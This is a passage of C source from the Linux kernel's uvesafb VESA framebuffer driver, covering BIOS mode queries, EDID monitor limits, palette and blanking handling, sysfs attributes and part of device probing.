mib->depth = mib->bits_per_pixel;
}
if (par->vbe_modes_cnt > 0)
return 0;
else
return -EINVAL;
}
/*
* The Protected Mode Interface is 32-bit x86 code, so we only run it on
* x86 and not x86_64.
*/
#ifdef CONFIG_X86_32
static int uvesafb_vbe_getpmi(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int i, err;
uvesafb_reset(task);
task->t.regs.eax = 0x4f0a;
task->t.regs.ebx = 0x0;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) != 0x4f || task->t.regs.es < 0xc000) {
par->pmi_setpal = par->ypan = 0;
} else {
par->pmi_base = (u16 *)phys_to_virt(((u32)task->t.regs.es << 4)
+ task->t.regs.edi);
par->pmi_start = (u8 *)par->pmi_base + par->pmi_base[1];
par->pmi_pal = (u8 *)par->pmi_base + par->pmi_base[2];
pr_info("protected mode interface info at %04x:%04x\n",
(u16)task->t.regs.es, (u16)task->t.regs.edi);
pr_info("pmi: set display start = %p, set palette = %p\n",
par->pmi_start, par->pmi_pal);
if (par->pmi_base[3]) {
pr_info("pmi: ports =");
for (i = par->pmi_base[3]/2;
par->pmi_base[i] != 0xffff; i++)
pr_cont(" %x", par->pmi_base[i]);
pr_cont("\n");
if (par->pmi_base[i] != 0xffff) {
pr_info("can't handle memory requests, pmi disabled\n");
par->ypan = par->pmi_setpal = 0;
}
}
}
return 0;
}
#endif /* CONFIG_X86_32 */
/*
* Check whether a video mode is supported by the Video BIOS and is
* compatible with the monitor limits.
*/
static int uvesafb_is_valid_mode(struct fb_videomode *mode,
struct fb_info *info)
{
if (info->monspecs.gtf) {
fb_videomode_to_var(&info->var, mode);
if (fb_validate_mode(&info->var, info))
return 0;
}
if (uvesafb_vbe_find_mode(info->par, mode->xres, mode->yres, 8,
UVESAFB_EXACT_RES) == -1)
return 0;
return 1;
}
static int uvesafb_vbe_getedid(struct uvesafb_ktask *task, struct fb_info *info)
{
struct uvesafb_par *par = info->par;
int err = 0;
if (noedid || par->vbe_ib.vbe_version < 0x0300)
return -EINVAL;
task->t.regs.eax = 0x4f15;
task->t.regs.ebx = 0;
task->t.regs.ecx = 0;
task->t.buf_len = 0;
task->t.flags = 0;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) != 0x004f || err)
return -EINVAL;
if ((task->t.regs.ebx & 0x3) == 3) {
pr_info("VBIOS/hardware supports both DDC1 and DDC2 transfers\n");
} else if ((task->t.regs.ebx & 0x3) == 2) {
pr_info("VBIOS/hardware supports DDC2 transfers\n");
} else if ((task->t.regs.ebx & 0x3) == 1) {
pr_info("VBIOS/hardware supports DDC1 transfers\n");
} else {
pr_info("VBIOS/hardware doesn't support DDC transfers\n");
return -EINVAL;
}
task->t.regs.eax = 0x4f15;
task->t.regs.ebx = 1;
task->t.regs.ecx = task->t.regs.edx = 0;
task->t.flags = TF_BUF_RET | TF_BUF_ESDI;
task->t.buf_len = EDID_LENGTH;
task->buf = kzalloc(EDID_LENGTH, GFP_KERNEL);
if (!task->buf)
return -ENOMEM;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) == 0x004f && !err) {
fb_edid_to_monspecs(task->buf, &info->monspecs);
if (info->monspecs.vfmax && info->monspecs.hfmax) {
/*
* If the maximum pixel clock wasn't specified in
* the EDID block, set it to 300 MHz.
*/
if (info->monspecs.dclkmax == 0)
info->monspecs.dclkmax = 300 * 1000000;
info->monspecs.gtf = 1;
}
} else {
err = -EINVAL;
}
kfree(task->buf);
return err;
}
static void uvesafb_vbe_getmonspecs(struct uvesafb_ktask *task,
struct fb_info *info)
{
struct uvesafb_par *par = info->par;
int i;
memset(&info->monspecs, 0, sizeof(info->monspecs));
/*
* If we don't get all necessary data from the EDID block,
* mark it as incompatible with the GTF and set nocrtc so
* that we always use the default BIOS refresh rate.
*/
if (uvesafb_vbe_getedid(task, info)) {
info->monspecs.gtf = 0;
par->nocrtc = 1;
}
/* Kernel command line overrides. */
if (maxclk)
info->monspecs.dclkmax = maxclk * 1000000;
if (maxvf)
info->monspecs.vfmax = maxvf;
if (maxhf)
info->monspecs.hfmax = maxhf * 1000;
/*
* In case DDC transfers are not supported, the user can provide
* monitor limits manually. Lower limits are set to "safe" values.
*/
if (info->monspecs.gtf == 0 && maxclk && maxvf && maxhf) {
info->monspecs.dclkmin = 0;
info->monspecs.vfmin = 60;
info->monspecs.hfmin = 29000;
info->monspecs.gtf = 1;
par->nocrtc = 0;
}
if (info->monspecs.gtf)
pr_info("monitor limits: vf = %d Hz, hf = %d kHz, clk = %d MHz\n",
info->monspecs.vfmax,
(int)(info->monspecs.hfmax / 1000),
(int)(info->monspecs.dclkmax / 1000000));
else
pr_info("no monitor limits have been set, default refresh rate will be used\n");
/* Add VBE modes to the modelist. */
for (i = 0; i < par->vbe_modes_cnt; i++) {
struct fb_var_screeninfo var;
struct vbe_mode_ib *mode;
struct fb_videomode vmode;
mode = &par->vbe_modes[i];
memset(&var, 0, sizeof(var));
var.xres = mode->x_res;
var.yres = mode->y_res;
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60, &var, info);
fb_var_to_videomode(&vmode, &var);
fb_add_videomode(&vmode, &info->modelist);
}
/* Add valid VESA modes to our modelist. */
for (i = 0; i < VESA_MODEDB_SIZE; i++) {
if (uvesafb_is_valid_mode((struct fb_videomode *)
&vesa_modes[i], info))
fb_add_videomode(&vesa_modes[i], &info->modelist);
}
for (i = 0; i < info->monspecs.modedb_len; i++) {
if (uvesafb_is_valid_mode(&info->monspecs.modedb[i], info))
fb_add_videomode(&info->monspecs.modedb[i],
&info->modelist);
}
return;
}
static void uvesafb_vbe_getstatesize(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int err;
uvesafb_reset(task);
/*
* Get the VBE state buffer size. We want all available
* hardware state data (CL = 0x0f).
*/
task->t.regs.eax = 0x4f04;
task->t.regs.ecx = 0x000f;
task->t.regs.edx = 0x0000;
task->t.flags = 0;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_warn("VBE state buffer size cannot be determined (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
par->vbe_state_size = 0;
return;
}
par->vbe_state_size = 64 * (task->t.regs.ebx & 0xffff);
}
static int uvesafb_vbe_init(struct fb_info *info)
{
struct uvesafb_ktask *task = NULL;
struct uvesafb_par *par = info->par;
int err;
task = uvesafb_prep();
if (!task)
return -ENOMEM;
err = uvesafb_vbe_getinfo(task, par);
if (err)
goto out;
err = uvesafb_vbe_getmodes(task, par);
if (err)
goto out;
par->nocrtc = nocrtc;
#ifdef CONFIG_X86_32
par->pmi_setpal = pmi_setpal;
par->ypan = ypan;
if (par->pmi_setpal || par->ypan) {
if (__supported_pte_mask & _PAGE_NX) {
par->pmi_setpal = par->ypan = 0;
pr_warn("NX protection is active, better not use the PMI\n");
} else {
uvesafb_vbe_getpmi(task, par);
}
}
#else
/* The protected mode interface is not available on non-x86. */
par->pmi_setpal = par->ypan = 0;
#endif
INIT_LIST_HEAD(&info->modelist);
uvesafb_vbe_getmonspecs(task, info);
uvesafb_vbe_getstatesize(task, par);
out: uvesafb_free(task);
return err;
}
static int uvesafb_vbe_init_mode(struct fb_info *info)
{
struct list_head *pos;
struct fb_modelist *modelist;
struct fb_videomode *mode;
struct uvesafb_par *par = info->par;
int i, modeid;
/* Has the user requested a specific VESA mode? */
if (vbemode) {
for (i = 0; i < par->vbe_modes_cnt; i++) {
if (par->vbe_modes[i].mode_id == vbemode) {
modeid = i;
uvesafb_setup_var(&info->var, info,
&par->vbe_modes[modeid]);
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60,
&info->var, info);
/*
* With pixclock set to 0, the default BIOS
* timings will be used in set_par().
*/
info->var.pixclock = 0;
goto gotmode;
}
}
pr_info("requested VBE mode 0x%x is unavailable\n", vbemode);
vbemode = 0;
}
/* Count the modes in the modelist */
i = 0;
list_for_each(pos, &info->modelist)
i++;
/*
* Convert the modelist into a modedb so that we can use it with
* fb_find_mode().
*/
mode = kzalloc(i * sizeof(*mode), GFP_KERNEL);
if (mode) {
i = 0;
list_for_each(pos, &info->modelist) {
modelist = list_entry(pos, struct fb_modelist, list);
mode[i] = modelist->mode;
i++;
}
if (!mode_option)
mode_option = UVESAFB_DEFAULT_MODE;
i = fb_find_mode(&info->var, info, mode_option, mode, i,
NULL, 8);
kfree(mode);
}
/* fb_find_mode() failed */
if (i == 0) {
info->var.xres = 640;
info->var.yres = 480;
mode = (struct fb_videomode *)
fb_find_best_mode(&info->var, &info->modelist);
if (mode) {
fb_videomode_to_var(&info->var, mode);
} else {
modeid = par->vbe_modes[0].mode_id;
uvesafb_setup_var(&info->var, info,
&par->vbe_modes[modeid]);
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60,
&info->var, info);
goto gotmode;
}
}
/* Look for a matching VBE mode. */
modeid = uvesafb_vbe_find_mode(par, info->var.xres, info->var.yres,
info->var.bits_per_pixel, UVESAFB_EXACT_RES);
if (modeid == -1)
return -EINVAL;
uvesafb_setup_var(&info->var, info, &par->vbe_modes[modeid]);
gotmode:
/*
* If we are not VBE3.0+ compliant, we're done -- the BIOS will
* ignore our timings anyway.
*/
if (par->vbe_ib.vbe_version < 0x0300 || par->nocrtc)
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60,
&info->var, info);
return modeid;
}
static int uvesafb_setpalette(struct uvesafb_pal_entry *entries, int count,
int start, struct fb_info *info)
{
struct uvesafb_ktask *task;
#ifdef CONFIG_X86
struct uvesafb_par *par = info->par;
int i = par->mode_idx;
#endif
int err = 0;
/*
* We support palette modifications for 8 bpp modes only, so
* there can never be more than 256 entries.
*/
if (start + count > 256)
return -EINVAL;
#ifdef CONFIG_X86
/* Use VGA registers if mode is VGA-compatible. */
if (i >= 0 && i < par->vbe_modes_cnt &&
par->vbe_modes[i].mode_attr & VBE_MODE_VGACOMPAT) {
for (i = 0; i < count; i++) {
outb_p(start + i, dac_reg);
outb_p(entries[i].red, dac_val);
outb_p(entries[i].green, dac_val);
outb_p(entries[i].blue, dac_val);
}
}
#ifdef CONFIG_X86_32
else if (par->pmi_setpal) {
__asm__ __volatile__(
"call *(%%esi)"
: /* no return value */
: "a" (0x4f09), /* EAX */
"b" (0), /* EBX */
"c" (count), /* ECX */
"d" (start), /* EDX */
"D" (entries), /* EDI */
"S" (&par->pmi_pal)); /* ESI */
}
#endif /* CONFIG_X86_32 */
else
#endif /* CONFIG_X86 */
{
task = uvesafb_prep();
if (!task)
return -ENOMEM;
task->t.regs.eax = 0x4f09;
task->t.regs.ebx = 0x0;
task->t.regs.ecx = count;
task->t.regs.edx = start;
task->t.flags = TF_BUF_ESDI;
task->t.buf_len = sizeof(struct uvesafb_pal_entry) * count;
task->buf = entries;
err = uvesafb_exec(task);
if ((task->t.regs.eax & 0xffff) != 0x004f)
err = 1;
uvesafb_free(task);
}
return err;
}
static int uvesafb_setcolreg(unsigned regno, unsigned red, unsigned green,
unsigned blue, unsigned transp,
struct fb_info *info)
{
struct uvesafb_pal_entry entry;
int shift = 16 - dac_width;
int err = 0;
if (regno >= info->cmap.len)
return -EINVAL;
if (info->var.bits_per_pixel == 8) {
entry.red = red >> shift;
entry.green = green >> shift;
entry.blue = blue >> shift;
entry.pad = 0;
err = uvesafb_setpalette(&entry, 1, regno, info);
} else if (regno < 16) {
switch (info->var.bits_per_pixel) {
case 16:
if (info->var.red.offset == 10) {
/* 1:5:5:5 */
((u32 *) (info->pseudo_palette))[regno] =
((red & 0xf800) >> 1) |
((green & 0xf800) >> 6) |
((blue & 0xf800) >> 11);
} else {
/* 0:5:6:5 */
((u32 *) (info->pseudo_palette))[regno] =
((red & 0xf800) ) |
((green & 0xfc00) >> 5) |
((blue & 0xf800) >> 11);
}
break;
case 24:
case 32:
red >>= 8;
green >>= 8;
blue >>= 8;
((u32 *)(info->pseudo_palette))[regno] =
(red << info->var.red.offset) |
(green << info->var.green.offset) |
(blue << info->var.blue.offset);
break;
}
}
return err;
}
static int uvesafb_setcmap(struct fb_cmap *cmap, struct fb_info *info)
{
struct uvesafb_pal_entry *entries;
int shift = 16 - dac_width;
int i, err = 0;
if (info->var.bits_per_pixel == 8) {
if (cmap->start + cmap->len > info->cmap.start +
info->cmap.len || cmap->start < info->cmap.start)
return -EINVAL;
entries = kmalloc(sizeof(*entries) * cmap->len, GFP_KERNEL);
if (!entries)
return -ENOMEM;
for (i = 0; i < cmap->len; i++) {
entries[i].red = cmap->red[i] >> shift;
entries[i].green = cmap->green[i] >> shift;
entries[i].blue = cmap->blue[i] >> shift;
entries[i].pad = 0;
}
err = uvesafb_setpalette(entries, cmap->len, cmap->start, info);
kfree(entries);
} else {
/*
* For modes with bpp > 8, we only set the pseudo palette in
* the fb_info struct. We rely on uvesafb_setcolreg to do all
* sanity checking.
*/
for (i = 0; i < cmap->len; i++) {
err |= uvesafb_setcolreg(cmap->start + i, cmap->red[i],
cmap->green[i], cmap->blue[i],
0, info);
}
}
return err;
}
static int uvesafb_pan_display(struct fb_var_screeninfo *var,
struct fb_info *info)
{
#ifdef CONFIG_X86_32
int offset;
struct uvesafb_par *par = info->par;
offset = (var->yoffset * info->fix.line_length + var->xoffset) / 4;
/*
* It turns out it's not the best idea to do panning via vm86,
* so we only allow it if we have a PMI.
*/
if (par->pmi_start) {
__asm__ __volatile__(
"call *(%%edi)"
: /* no return value */
: "a" (0x4f07), /* EAX */
"b" (0), /* EBX */
"c" (offset), /* ECX */
"d" (offset >> 16), /* EDX */
"D" (&par->pmi_start)); /* EDI */
}
#endif
return 0;
}
static int uvesafb_blank(int blank, struct fb_info *info)
{
struct uvesafb_ktask *task;
int err = 1;
#ifdef CONFIG_X86
struct uvesafb_par *par = info->par;
if (par->vbe_ib.capabilities & VBE_CAP_VGACOMPAT) {
int loop = 10000;
u8 seq = 0, crtc17 = 0;
if (blank == FB_BLANK_POWERDOWN) {
seq = 0x20;
crtc17 = 0x00;
err = 0;
} else {
seq = 0x00;
crtc17 = 0x80;
err = (blank == FB_BLANK_UNBLANK) ? 0 : -EINVAL;
}
vga_wseq(NULL, 0x00, 0x01);
seq |= vga_rseq(NULL, 0x01) & ~0x20;
vga_wseq(NULL, 0x00, seq);
crtc17 |= vga_rcrt(NULL, 0x17) & ~0x80;
while (loop--);
vga_wcrt(NULL, 0x17, crtc17);
vga_wseq(NULL, 0x00, 0x03);
} else
#endif /* CONFIG_X86 */
{
task = uvesafb_prep();
if (!task)
return -ENOMEM;
task->t.regs.eax = 0x4f10;
switch (blank) {
case FB_BLANK_UNBLANK:
task->t.regs.ebx = 0x0001;
break;
case FB_BLANK_NORMAL:
task->t.regs.ebx = 0x0101; /* standby */
break;
case FB_BLANK_POWERDOWN:
task->t.regs.ebx = 0x0401; /* powerdown */
break;
default:
goto out;
}
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f)
err = 1;
out: uvesafb_free(task);
}
return err;
}
static int uvesafb_open(struct fb_info *info, int user)
{
struct uvesafb_par *par = info->par;
int cnt = atomic_read(&par->ref_count);
u8 *buf = NULL;
if (!cnt && par->vbe_state_size) {
buf = uvesafb_vbe_state_save(par);
if (IS_ERR(buf)) {
pr_warn("save hardware state failed, error code is %ld!\n",
PTR_ERR(buf));
} else {
par->vbe_state_orig = buf;
}
}
atomic_inc(&par->ref_count);
return 0;
}
static int uvesafb_release(struct fb_info *info, int user)
{
struct uvesafb_ktask *task = NULL;
struct uvesafb_par *par = info->par;
int cnt = atomic_read(&par->ref_count);
if (!cnt)
return -EINVAL;
if (cnt != 1)
goto out;
task = uvesafb_prep();
if (!task)
goto out;
/* First, try to set the standard 80x25 text mode. */
task->t.regs.eax = 0x0003;
uvesafb_exec(task);
/*
* Now try to restore whatever hardware state we might have
* saved when the fb device was first opened.
*/
uvesafb_vbe_state_restore(par, par->vbe_state_orig);
out:
atomic_dec(&par->ref_count);
uvesafb_free(task);
return 0;
}
static int uvesafb_set_par(struct fb_info *info)
{
struct uvesafb_par *par = info->par;
struct uvesafb_ktask *task = NULL;
struct vbe_crtc_ib *crtc = NULL;
struct vbe_mode_ib *mode = NULL;
int i, err = 0, depth = info->var.bits_per_pixel;
if (depth > 8 && depth != 32)
depth = info->var.red.length + info->var.green.length +
info->var.blue.length;
i = uvesafb_vbe_find_mode(par, info->var.xres, info->var.yres, depth,
UVESAFB_EXACT_RES | UVESAFB_EXACT_DEPTH);
if (i >= 0)
mode = &par->vbe_modes[i];
else
return -EINVAL;
task = uvesafb_prep();
if (!task)
return -ENOMEM;
setmode:
task->t.regs.eax = 0x4f02;
task->t.regs.ebx = mode->mode_id | 0x4000; /* use LFB */
if (par->vbe_ib.vbe_version >= 0x0300 && !par->nocrtc &&
info->var.pixclock != 0) {
task->t.regs.ebx |= 0x0800; /* use CRTC data */
task->t.flags = TF_BUF_ESDI;
crtc = kzalloc(sizeof(struct vbe_crtc_ib), GFP_KERNEL);
if (!crtc) {
err = -ENOMEM;
goto out;
}
crtc->horiz_start = info->var.xres + info->var.right_margin;
crtc->horiz_end = crtc->horiz_start + info->var.hsync_len;
crtc->horiz_total = crtc->horiz_end + info->var.left_margin;
crtc->vert_start = info->var.yres + info->var.lower_margin;
crtc->vert_end = crtc->vert_start + info->var.vsync_len;
crtc->vert_total = crtc->vert_end + info->var.upper_margin;
crtc->pixel_clock = PICOS2KHZ(info->var.pixclock) * 1000;
crtc->refresh_rate = (u16)(100 * (crtc->pixel_clock /
(crtc->vert_total * crtc->horiz_total)));
if (info->var.vmode & FB_VMODE_DOUBLE)
crtc->flags |= 0x1;
if (info->var.vmode & FB_VMODE_INTERLACED)
crtc->flags |= 0x2;
if (!(info->var.sync & FB_SYNC_HOR_HIGH_ACT))
crtc->flags |= 0x4;
if (!(info->var.sync & FB_SYNC_VERT_HIGH_ACT))
crtc->flags |= 0x8;
memcpy(&par->crtc, crtc, sizeof(*crtc));
} else {
memset(&par->crtc, 0, sizeof(*crtc));
}
task->t.buf_len = sizeof(struct vbe_crtc_ib);
task->buf = &par->crtc;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
/*
* The mode switch might have failed because we tried to
* use our own timings. Try again with the default timings.
*/
if (crtc != NULL) {
pr_warn("mode switch failed (eax=0x%x, err=%d) - trying again with default timings\n",
task->t.regs.eax, err);
uvesafb_reset(task);
kfree(crtc);
crtc = NULL;
info->var.pixclock = 0;
goto setmode;
} else {
pr_err("mode switch failed (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
err = -EINVAL;
goto out;
}
}
par->mode_idx = i;
/* For 8bpp modes, always try to set the DAC to 8 bits. */
if (par->vbe_ib.capabilities & VBE_CAP_CAN_SWITCH_DAC &&
mode->bits_per_pixel <= 8) {
uvesafb_reset(task);
task->t.regs.eax = 0x4f08;
task->t.regs.ebx = 0x0800;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f ||
((task->t.regs.ebx & 0xff00) >> 8) != 8) {
dac_width = 6;
} else {
dac_width = 8;
}
}
info->fix.visual = (info->var.bits_per_pixel == 8) ?
FB_VISUAL_PSEUDOCOLOR : FB_VISUAL_TRUECOLOR;
info->fix.line_length = mode->bytes_per_scan_line;
out:
kfree(crtc);
uvesafb_free(task);
return err;
}
static void uvesafb_check_limits(struct fb_var_screeninfo *var,
struct fb_info *info)
{
const struct fb_videomode *mode;
struct uvesafb_par *par = info->par;
/*
* If pixclock is set to 0, then we're using default BIOS timings
* and thus don't have to perform any checks here.
*/
if (!var->pixclock)
return;
if (par->vbe_ib.vbe_version < 0x0300) {
fb_get_mode(FB_VSYNCTIMINGS | FB_IGNOREMON, 60, var, info);
return;
}
if (!fb_validate_mode(var, info))
return;
mode = fb_find_best_mode(var, &info->modelist);
if (mode) {
if (mode->xres == var->xres && mode->yres == var->yres &&
!(mode->vmode & (FB_VMODE_INTERLACED | FB_VMODE_DOUBLE))) {
fb_videomode_to_var(var, mode);
return;
}
}
if (info->monspecs.gtf && !fb_get_mode(FB_MAXTIMINGS, 0, var, info))
return;
/* Use default refresh rate */
var->pixclock = 0;
}
static int uvesafb_check_var(struct fb_var_screeninfo *var,
struct fb_info *info)
{
struct uvesafb_par *par = info->par;
struct vbe_mode_ib *mode = NULL;
int match = -1;
int depth = var->red.length + var->green.length + var->blue.length;
/*
* Various apps will use bits_per_pixel to set the color depth,
* which is theoretically incorrect, but which we'll try to handle
* here.
*/
if (depth == 0 || abs(depth - var->bits_per_pixel) >= 8)
depth = var->bits_per_pixel;
match = uvesafb_vbe_find_mode(par, var->xres, var->yres, depth,
UVESAFB_EXACT_RES);
if (match == -1)
return -EINVAL;
mode = &par->vbe_modes[match];
uvesafb_setup_var(var, info, mode);
/*
* Check whether we have remapped enough memory for this mode.
* We might be called at an early stage, when we haven't remapped
* any memory yet, in which case we simply skip the check.
*/
if (var->yres * mode->bytes_per_scan_line > info->fix.smem_len
&& info->fix.smem_len)
return -EINVAL;
if ((var->vmode & FB_VMODE_DOUBLE) &&
!(par->vbe_modes[match].mode_attr & 0x100))
var->vmode &= ~FB_VMODE_DOUBLE;
if ((var->vmode & FB_VMODE_INTERLACED) &&
!(par->vbe_modes[match].mode_attr & 0x200))
var->vmode &= ~FB_VMODE_INTERLACED;
uvesafb_check_limits(var, info);
var->xres_virtual = var->xres;
var->yres_virtual = (par->ypan) ?
info->fix.smem_len / mode->bytes_per_scan_line :
var->yres;
return 0;
}
static struct fb_ops uvesafb_ops = {
.owner = THIS_MODULE,
.fb_open = uvesafb_open,
.fb_release = uvesafb_release,
.fb_setcolreg = uvesafb_setcolreg,
.fb_setcmap = uvesafb_setcmap,
.fb_pan_display = uvesafb_pan_display,
.fb_blank = uvesafb_blank,
.fb_fillrect = cfb_fillrect,
.fb_copyarea = cfb_copyarea,
.fb_imageblit = cfb_imageblit,
.fb_check_var = uvesafb_check_var,
.fb_set_par = uvesafb_set_par,
};
static void uvesafb_init_info(struct fb_info *info, struct vbe_mode_ib *mode)
{
unsigned int size_vmode;
unsigned int size_remap;
unsigned int size_total;
struct uvesafb_par *par = info->par;
int i, h;
info->pseudo_palette = ((u8 *)info->par + sizeof(struct uvesafb_par));
info->fix = uvesafb_fix;
info->fix.ypanstep = par->ypan ? 1 : 0;
info->fix.ywrapstep = (par->ypan > 1) ? 1 : 0;
/* Disable blanking if the user requested so. */
if (!blank)
info->fbops->fb_blank = NULL;
/*
* Find out how much IO memory is required for the mode with
* the highest resolution.
*/
size_remap = 0;
for (i = 0; i < par->vbe_modes_cnt; i++) {
h = par->vbe_modes[i].bytes_per_scan_line *
par->vbe_modes[i].y_res;
if (h > size_remap)
size_remap = h;
}
size_remap *= 2;
/*
* size_vmode -- that is the amount of memory needed for the
* used video mode, i.e. the minimum amount of
* memory we need.
*/
size_vmode = info->var.yres * mode->bytes_per_scan_line;
/*
* size_total -- all video memory we have. Used for mtrr
* entries, resource allocation and bounds
* checking.
*/
size_total = par->vbe_ib.total_memory * 65536;
if (vram_total)
size_total = vram_total * 1024 * 1024;
if (size_total < size_vmode)
size_total = size_vmode;
/*
* size_remap -- the amount of video memory we are going to
* use for vesafb. With modern cards it is no
* option to simply use size_total as th
* wastes plenty of kernel address space.
*/
if (vram_remap)
size_remap = vram_remap * 1024 * 1024;
if (size_remap < size_vmode)
size_remap = size_vmode;
if (size_remap > size_total)
size_remap = size_total;
info->fix.smem_len = size_remap;
info->fix.smem_start = mode->phys_base_ptr;
/*
* We have to set yres_virtual here because when setup_var() was
* called, smem_len wasn't defined yet.
*/
info->var.yres_virtual = info->fix.smem_len /
mode->bytes_per_scan_line;
if (par->ypan && info->var.yres_virtual > info->var.yres) {
pr_info("scrolling: %s using protected mode interface, yres_virtual=%d\n",
(par->ypan > 1) ? "ywrap" : "ypan",
info->var.yres_virtual);
} else {
pr_info("scrolling: redraw\n");
info->var.yres_virtual = info->var.yres;
par->ypan = 0;
}
info->flags = FBINFO_FLAG_DEFAULT |
(par->ypan ? FBINFO_HWACCEL_YPAN : 0);
if (!par->ypan)
info->fbops->fb_pan_display = NULL;
}
static void uvesafb_init_mtrr(struct fb_info *info)
{
struct uvesafb_par *par = info->par;
if (mtrr && !(info->fix.smem_start & (PAGE_SIZE - 1))) {
int temp_size = info->fix.smem_len;
int rc;
/* Find the largest power-of-two */
temp_size = roundup_pow_of_two(temp_size);
/* Try and find a power of two to add */
do {
rc = arch_phys_wc_add(info->fix.smem_start, temp_size);
temp_size >>= 1;
} while (temp_size >= PAGE_SIZE && rc == -EINVAL);
if (rc >= 0)
par->mtrr_handle = rc;
}
}
static void uvesafb_ioremap(struct fb_info *info)
{
info->screen_base = ioremap_wc(info->fix.smem_start, info->fix.smem_len);
}
static ssize_t uvesafb_show_vbe_ver(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
return snprintf(buf, PAGE_SIZE, "%.4x\n", par->vbe_ib.vbe_version);
}
static DEVICE_ATTR(vbe_version, S_IRUGO, uvesafb_show_vbe_ver, NULL);
static ssize_t uvesafb_show_vbe_modes(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
int ret = 0, i;
for (i = 0; i < par->vbe_modes_cnt && ret < PAGE_SIZE; i++) {
ret += snprintf(buf + ret, PAGE_SIZE - ret,
"%dx%d-%d, 0x%.4x\n",
par->vbe_modes[i].x_res, par->vbe_modes[i].y_res,
par->vbe_modes[i].depth, par->vbe_modes[i].mode_id);
}
return ret;
}
static DEVICE_ATTR(vbe_modes, S_IRUGO, uvesafb_show_vbe_modes, NULL);
static ssize_t uvesafb_show_vendor(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_vendor_name_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n", (char *)
(&par->vbe_ib) + par->vbe_ib.oem_vendor_name_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_vendor, S_IRUGO, uvesafb_show_vendor, NULL);
static ssize_t uvesafb_show_product_name(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_product_name_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n", (char *)
(&par->vbe_ib) + par->vbe_ib.oem_product_name_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_product_name, S_IRUGO, uvesafb_show_product_name, NULL);
static ssize_t uvesafb_show_product_rev(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_product_rev_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n", (char *)
(&par->vbe_ib) + par->vbe_ib.oem_product_rev_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_product_rev, S_IRUGO, uvesafb_show_product_rev, NULL);
static ssize_t uvesafb_show_oem_string(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (par->vbe_ib.oem_string_ptr)
return snprintf(buf, PAGE_SIZE, "%s\n",
(char *)(&par->vbe_ib) + par->vbe_ib.oem_string_ptr);
else
return 0;
}
static DEVICE_ATTR(oem_string, S_IRUGO, uvesafb_show_oem_string, NULL);
static ssize_t uvesafb_show_nocrtc(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
return snprintf(buf, PAGE_SIZE, "%d\n", par->nocrtc);
}
static ssize_t uvesafb_store_nocrtc(struct device *dev,
struct device_attribute *attr, const char *buf, size_t count)
{
struct fb_info *info = platform_get_drvdata(to_platform_device(dev));
struct uvesafb_par *par = info->par;
if (count > 0) {
if (buf[0] == '0')
par->nocrtc = 0;
else
par->nocrtc = 1;
}
return count;
}
static DEVICE_ATTR(nocrtc, S_IRUGO | S_IWUSR, uvesafb_show_nocrtc,
uvesafb_store_nocrtc);
static struct attribute *uvesafb_dev_attrs[] = {
&dev_attr_vbe_version.attr,
&dev_attr_vbe_modes.attr,
&dev_attr_oem_vendor.attr,
&dev_attr_oem_product_name.attr,
&dev_attr_oem_product_rev.attr,
&dev_attr_oem_string.attr,
&dev_attr_nocrtc.attr,
NULL,
};
static const struct attribute_group uvesafb_dev_attgrp = {
.name = NULL,
.attrs = uvesafb_dev_attrs,
};
static int uvesafb_probe(struct platform_device *dev)
{
struct fb_info *info;
struct vbe_mode_ib *mode = NULL;
struct uvesafb_par *par;
int err = 0, i;
info = framebuffer_alloc(sizeof(*par) + sizeof(u32) * 256, &dev->dev);
if (!info)
return -ENOMEM;
par = info->par;
err = uvesafb_vbe_init(info);
if (err) {
pr_err("vbe_init() failed with %d\n", err);
goto out;
}
info->fbops = &uvesafb_ops;
i = uvesafb_vbe_init_mode(info);
if (i < 0) {
err = -EINVAL;
goto out;
} else {
mode = &par->vbe_modes[i];
}
if (fb_alloc_cmap(&info->cmap, 256, 0) < 0) {
err = -ENXIO;
goto out;
}
uvesafb_init_info(info, mode);
if (!request_region(0x3c0, 32, "uvesafb")) {
pr_err("request region 0x3c0-0x3e0 failed\n");
err = -EIO;
goto out_mode;
}
if (!request_mem_region(info->fix.smem_start, info->fix.smem_len,
"uvesafb")) {
pr_err("cannot reserve video memory at 0x%lx\n",
info->fix.smem_start);
err = -EIO;
goto out_reg;
}
uvesafb_init_mtrr(info);
